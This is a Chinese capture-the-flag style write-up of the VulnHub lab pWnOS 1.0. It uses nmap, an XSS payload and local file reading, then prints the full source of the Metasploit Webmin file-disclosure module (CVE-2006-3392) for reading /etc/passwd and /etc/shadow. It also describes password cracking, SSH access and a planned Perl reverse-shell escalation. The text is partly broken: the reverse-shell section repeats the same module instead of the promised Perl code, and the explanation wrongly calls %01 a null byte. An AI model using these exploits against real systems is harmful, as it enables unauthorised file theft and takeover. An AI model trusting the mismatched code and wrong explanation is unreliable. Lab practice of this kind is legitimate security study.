2026-04-01

pWnOS: 1.0

项目地址：https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip

是一个打包好的镜像文件

注意：导入 vmx 时一定要选择我已移动，否则没网

使用 Nmap 扫描出开放服务及操作系统版本

1	nmap -sS -sV -sC -p- 192.168.41.202

XSS

name&level（两个反射）

80 端口发现两个 XSS 漏洞，对应的参数是 name 以及 level

1	<script>alert(66)</script>

返回提交的页面，两个参数都默认为 true

尝试改为 false 时 connect 报错，错误内容是文件包含函数

通过 AI 查询报错信息得知后端接受参数 connect 参数的值必须得为存在的文件名

任意文件读取

connect

推测存在任意文件读取漏洞

传入参数 /etc/passwd 成功读取文件，但是读取不了 /etc/shadow 文件

访问 10000 端口是个 Web 服务

CVE-2006-3392

对于 10000 端口的服务信息尝试搜索 Kali 本地缓存的历史漏洞，有戏

继续使用更为强大的渗透工具 MSF 搜索漏洞模块进行探测

因为第一个 unix/webapp/webmin_show_cgi_exec 发现使用时必须填入账号名密码，但是我们没有

所以切换为第二个 admin/webmin/file_disclosure 尝试

设置目标后成功读取了 etc/passwd 文件

接下来尝试读取 /etc/shadow

脚本源码解析如下

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin File Disclosure',
        'Description' => %q{
          A vulnerability has been reported in Webmin and Usermin, which can be
          exploited by malicious people to disclose potentially sensitive information.
          The vulnerability is caused due to an unspecified error within the handling
          of an URL. This can be exploited to read the contents of any files on the
          server via a specially crafted URL, without requiring a valid login.
          The vulnerability has been reported in Webmin (versions prior to 1.290) and
          Usermin (versions prior to 1.220).
        },
        'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '26772'],
          ['BID', '18744'],
          ['CVE', '2006-3392'],
          ['US-CERT-VU', '999601'],
          ['URL', 'https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/'],
        ],
        'DisclosureDate' => '2006-06-30',
        'Actions' => [
          ['Download', { 'Description' => 'Download arbitrary file' }]
        ],
        'DefaultAction' => 'Download',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10000),
        OptString.new(
          'RPATH',
          [
            true,
            'The file to download',
            '/etc/passwd'
          ]
        ),
        OptString.new(
          'DIR',
          [
            true,
            'Webmin directory path',
            '/unauthenticated'
          ]
        ),
      ]
    )
  end

  def run
    print_status("Attempting to retrieve #{datastore['RPATH']}...")

    dir = normalize_uri(datastore['DIR'])
    uri = Rex::Text.uri_encode(dir) + '/..%01' * 40 + Rex::Text.uri_encode(datastore['RPATH'])

    res = send_request_raw({
      'uri' => uri
    }, 10)

    if res
      print_status("The server returned: #{res.code} #{res.message}")
      print(res.body)
    else
      print_status('No response from the server')
    end
  end
end

深入解析 ..%01：

.. (点点): 正常的上级目录跳转指令
%01 (空字节 / Null Byte): 这是 ASCII 字符 0x01 的 URL 编码形式。
- 在早期版本的 Webmin 中，这个字符在路径清理阶段（第一步）不会被移除，因为它不是一个常规的路径分隔符
- 但在最终的文件系统调用之前，Webmin 或底层的系统库可能会将这个不可见的 %01 字符剥离或忽略掉，从而只留下一个有效的路径分隔符，如 /

弱口令

SSH 登录

使用工具 john 成功爆破出一个密码

SSH 连接时注意切换加密算法，对方是老版的只支持 RSA

1	ssh -o HostKeyAlgorithms=+ssh-rsa vmware@192.168.41.202

提权

Webmin 反弹 Shell

接下来去看有没有别的提权方法，查看 /var 发现 webmin 是以 root 运行

同时网站采用 .cgi 通用网关接口的形式，其是支持 Perl 语言的

所以我们可以编写一个 Perl 的反弹 Shell，只需要找到一个可以写的位置并使用文件包含来调用该文件

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin File Disclosure',
        'Description' => %q{
          A vulnerability has been reported in Webmin and Usermin, which can be
          exploited by malicious people to disclose potentially sensitive information.
          The vulnerability is caused due to an unspecified error within the handling
          of an URL. This can be exploited to read the contents of any files on the
          server via a specially crafted URL, without requiring a valid login.
          The vulnerability has been reported in Webmin (versions prior to 1.290) and
          Usermin (versions prior to 1.220).
        },
        'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '26772'],
          ['BID', '18744'],
          ['CVE', '2006-3392'],
          ['US-CERT-VU', '999601'],
          ['URL', 'https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/'],
        ],
        'DisclosureDate' => '2006-06-30',
        'Actions' => [
          ['Download', { 'Description' => 'Download arbitrary file' }]
        ],
        'DefaultAction' => 'Download',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10000),
        OptString.new(
          'RPATH',
          [
            true,
            'The file to download',
            '/etc/passwd'
          ]
        ),
        OptString.new(
          'DIR',
          [
            true,
            'Webmin directory path',
            '/unauthenticated'
          ]
        ),
      ]
    )
  end

  def run
    print_status("Attempting to retrieve #{datastore['RPATH']}...")

    dir = normalize_uri(datastore['DIR'])
    uri = Rex::Text.uri_encode(dir) + '/..%01' * 40 + Rex::Text.uri_encode(datastore['RPATH'])

    res = send_request_raw({
      'uri' => uri
    }, 10)

    if res
      print_status("The server returned: #{res.code} #{res.message}")
      print(res.body)
    else
      print_status('No response from the server')
    end
  end
end

输入命令导航到指定目录，该 URL 会触发服务器上的 CGI 脚本，从而触发权限提升（参考上面）